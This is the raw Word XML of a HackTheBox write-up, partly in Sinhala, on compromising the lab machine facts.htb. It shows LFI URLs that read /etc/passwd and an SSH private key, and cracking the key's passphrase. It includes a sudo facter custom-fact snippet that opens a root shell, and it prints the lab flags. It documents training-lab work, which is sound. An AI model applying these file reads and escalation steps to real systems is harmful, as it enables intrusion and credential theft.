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2E4057"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">facts.htb</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="048A81"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">HackTheBox Writeup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Author: Sigiri  |  Date: 2026-04-28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Linux (Ubuntu 25.04)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10.129.31.126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Easy / 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User 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37f63ebecc613e01fb7828b3acd94b9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Root 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b97bb3b3220c88aa2c469af8c3fceb33</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="048A81" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pP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1. Reconnaissance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1.1 Hosts File Setup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">facts.htb domain එකට IP address map කිරීම සඳහා /etc/hosts file එකට entry එකක් add කරන ලදි.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1.2 Port Scanning — RustScan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">RustScan tool එක භාවිතා කර target machine open ports scan කරන ලදි.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>Open ports: 22 (SSH), 80 (HTTP), 54321 (unknown)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1.3 Service Detection — Nmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap scan දෙකක් run කරන ලදි — initial scan සහ confirmed scan.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>Port 22: OpenSSH 9.9p1 | Port 80: nginx 1.26.3 (Ubuntu)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="048A81" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pP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2. Web Enumeration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2.1 Web Application</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP port 80 හරහා "FACTS" නමැති web application එකක් discover කරන ලදි.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2.2 Directory Enumeration — Gobuster</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Gobuster tool භාවිතා කර /admin directory discover කරන ලදි. Server non-existing URLs සඳහා 302 redirect return කරන නිසා --exclude-length 0 flag භාවිතා කළ යුතු විය.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499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gobuster dir -u http://facts.htb -w /usr/share/wordlists/dirb/common.txt --exclude-length 0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2.3 Admin Panel Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Login page discover කිරීමෙන් පසු, "Create an account" feature හරහා account එකක් create කර login කරන ලදි.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28575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2.4 Privilege Escalation — Admin Role</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Profile edit page හරහා user Role "Client" සිට "Administrator" ලෙස change කර admin access ලබා ගන්ලදි.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4191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486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48A81" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pP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3. Local File Inclusion (LFI)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Admin panel හි media download endpoint එකේ "file" parameter vulnerable බව discover කරන ලදි.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http://facts.htb/admin/media/download_private_file?file=/etc/passwd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3.1 /etc/passwd Read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>Users discovered: trivia (uid:1000), william (uid:1001)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3.2 SSH Private Key Extraction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">trivia user ගේ SSH private key (Ed25519) LFI vulnerability හරහා extract කරන ලදි.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http://facts.htb/admin/media/download_private_file?file=/home/trivia/.ssh/id_ed25519</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="048A81" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pP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4. Initial Access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4.1 SSH Key Passphrase Cracking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Extracted key එක bcrypt encrypted (passphrase protected) විය. ssh2john සහ John the Ripper භාවිතා කර passphrase crack කරන ලදි.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636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ssh2john id_ed25519 &gt; ssh_hash.txt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john ssh_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="048A81"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Passphrase cracked: dragonballz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4.2 SSH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ssh -i id_ed25519 trivia@facts.htb</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Passphrase: dragonballz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4.3 User Flag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2E4057"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">User flag: 37f63ebecc613e01fb7828b3acd94b9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="048A81" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pP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5. Privilege Escalation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5.1 Sudo Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l command හරහා trivia user ට /usr/bin/facter NOPASSWD execute කළ හැකි බව confirm කරන ලදි.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5.2 Facter Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">facter custom facts feature exploit කර root shell ලබා ගන්ලදි.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mkdir -p /tmp/facts.d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cat &gt; /tmp/facts.d/evil.rb &lt;&lt; 'EOF'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Facter.add('evil') do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setcode do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  system('/bin/bash -p')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EOF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sudo facter --custom-dir /tmp/facts.d evil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5.3 Root Flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="33147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CC0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Root flag: b97bb3b3220c88aa2c469af8c3fceb33</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="048A81" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pP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6. Attack Chain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Recon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RustScan + Nmap — ports 22, 80 discovered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Web Enum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Gobuster — /admin panel discovered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Auth Bypass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Self-registration + role change to Administrator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LFI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download_private_file?file= parameter vulnerable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Key Extract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/home/trivia/.ssh/id_ed25519 extracted via LFI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John the Ripper — passphrase: dragonballz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SSH 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trivia@facts.htb — user flag obtained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PrivEsc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sudo facter --custom-dir exploit — root shell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Root Flag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cat /root/root.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="300"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="048A81"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">facts.htb — Pwned! 🚩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1d542844e41f8bb10f45a6f74fba126228858f.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/f5664a0cc9cf9721756ee85fe96a36092bbbc7a3.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/25da5ef9755aa59f569b5dd04a5cf48297f938ca.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/07829e098f123a2b080e78cfce9201b265f5163c.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/ce539c07ba2f5a85b2183184fd3a35156d77cc29.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/34f3de876bf88d7285bbf55b41f314322def13bd.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/29a56dbc1c20265d8c7ac041b4de6657cc129e5d.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/83a188369542089f17b96ca8139a5aed3b6c13d3.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/38935e77b26bcb3223c6e7369aef23fe024ee624.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/62d43c82dbd649ab41eaacf831a46f240bdabbad.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/94e842ded599886ffa12b35a47b901dad740ec90.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/ca97b44128a617ec4cc9410aac64c65d3e2818b5.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/3b051f13f038e91dde6dd3398a1084376f057683.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/f832a1b8f05b17d53635718aaeb22be472180128.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/a9ae4403e4574fe6ccbc9c1af7e55bf482020abb.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/3b0f328a544a1806879a4251ccc9a50ae9794620.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/e0a76a7cd3ec6225ba8ccfb7fd4b7d3884fc26b9.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/8569f8cc79d9c57c1b1d13ef225a261e688a7573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2026-04-28T07:14:20.318Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-28T07:14:20.318Z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